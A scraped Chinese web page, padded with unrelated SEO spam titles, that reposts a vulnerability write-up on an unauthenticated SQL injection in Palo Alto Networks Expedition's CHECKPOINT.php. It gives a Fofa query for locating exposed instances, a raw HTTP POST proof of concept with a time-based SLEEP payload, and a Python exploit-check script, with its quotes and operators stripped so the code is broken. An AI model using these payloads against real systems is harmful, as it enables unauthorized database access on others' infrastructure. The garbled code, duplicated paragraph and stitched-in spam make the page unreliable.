当前位置: 首页 > news >正文

公司网站备案查询公司seo是指什么意思

公司网站备案查询,公司seo是指什么意思,上海建筑网站大全,视频链接生成器在线0x01 产品介绍#xff1a; Palo Alto Networks Expedition 是一款强大的工具#xff0c;帮助用户有效地迁移和优化网络安全策略#xff0c;提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述 Palo Alto Networks Expedition 是一款强大的工具帮助用户有效地迁移和优化网络安全策略提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。 0x02 漏洞描述 该漏洞由于CHECKPOINT.php文件存在未授权访问。在sql校验逻辑中存在actionimport当解析控制参数时会创建变量routename和id并且以字符串格式构造查询。导致了漏洞的产生 0x03 影响版本 Palo Alto Networks Expedition 1.2.96 0x04 搜索语句 Fofa:titleExpedition Project 0x05 漏洞复现 poc POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedactionimporttypetestprojectpandbRBACsignatureid1%20AND%20(SELECT%201234%20FROM%20(SELECT(SLEEP(5)))test) 检测脚本 脚本作者https://github.com/horizon3ai/CVE-2024-9465 #!/usr/bin/python3 import argparse import requests import urllib3 import sys import time urllib3.disable_warnings()def create_checkpoint_table(url: str):print(f[*] Creating Checkpoint database table...)data {action: get,type: existing_ruleBases,project: pandbRBAC,}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)if r.status_code 200 and ruleBasesNames in r.text:print(f[*] Successfully created the database table)returnprint(f[-] Unexpected response creating table: {r.status_code}:{r.text})sys.exit(1)def inject_checkpoint_query(url: str):start_time time.time()print(f[*] Injecting 10 second sleep payload into database query...)data {action: import,type: test,project: pandbRBAC,signatureid: 1 AND (SELECT 1234 FROM (SELECT(SLEEP(10)))horizon3),}r requests.post(f{url}/bin/configurations/parsers/Checkpoint/CHECKPOINT.php, datadata, verifyFalse, timeout30)execution_time time.time() - start_timeif r.status_code 200 and execution_time 9 and execution_time 15:print(f[*] Successfully sent injection payload!)print(f[] Target is vulnerable, request took {execution_time} seconds)returnprint(f[-] Unexpected response sending injection payload: {r.status_code}:{r.text})sys.exit(1)if __name__ __main__:parser argparse.ArgumentParser()parser.add_argument(-u, --url, helpThe URL of the target, typestr, requiredTrue)args parser.parse_args()create_checkpoint_table(args.url)inject_checkpoint_query(args.url)0x06 修复建议 厂商已发布补丁 请即时升级 Expedition | Palo Alto Networks
http://www.pierceye.com/news/64933/

相关文章:

  • 郑州 网站建设 东区网站设计与制作费用
  • 关于网站建设的名言黑wordpress网站
  • 大理做网站哪家好工地找工作哪个软件好
  • 4网站建设哪里好点网站上做推广方案
  • 网站宣传与推广的方法广州市网站建设制作费用
  • 什么叫网站外链wordpress插件必备
  • 企业服务建设网站wordpress 注册密码
  • app网站软件公众号流量投放
  • 静态网站站内搜索道滘仿做网站
  • 建设虚拟币交易网站外贸网站推广有用吗
  • 长沙 外贸网站建设赣州今天招工信息赣州人才网
  • 网站建设上市合肥网站外包
  • 万江建设网站设计公司企业计划书
  • 广州手机网站建设价格wordpress设置注册页面
  • 青岛网站亚马逊跨境电商平台介绍
  • 电子商务网站的建站目标免费外贸网站制作
  • 深圳网站建设哪些wordpress s5主题
  • 北京公司注销网站优化具体是怎么做的
  • 购物网站策划方案建设工程网站建筑工程预算
  • 适合做网站的图片做销售在哪些网站发贴
  • 做本地团购网站怎么样百度搜索风云榜明星
  • 云栖建站昆明广告设计公司排行
  • 上海知名网站建设公司健康义乌app
  • 哪个网站注册域名wordpress 本机安装目录
  • 深圳自适应网站建设价格建筑网官网查询
  • 做网站都需要哪些技术怎样增加网站会员量
  • 小规模公司需要交哪些税百度seo高级优化
  • 做网站费用需要分摊吗中学生做的安全作业网站
  • 响应式网站导航栏做服装哪个网站图片多
  • 知识付费网站建设银行网站建设方案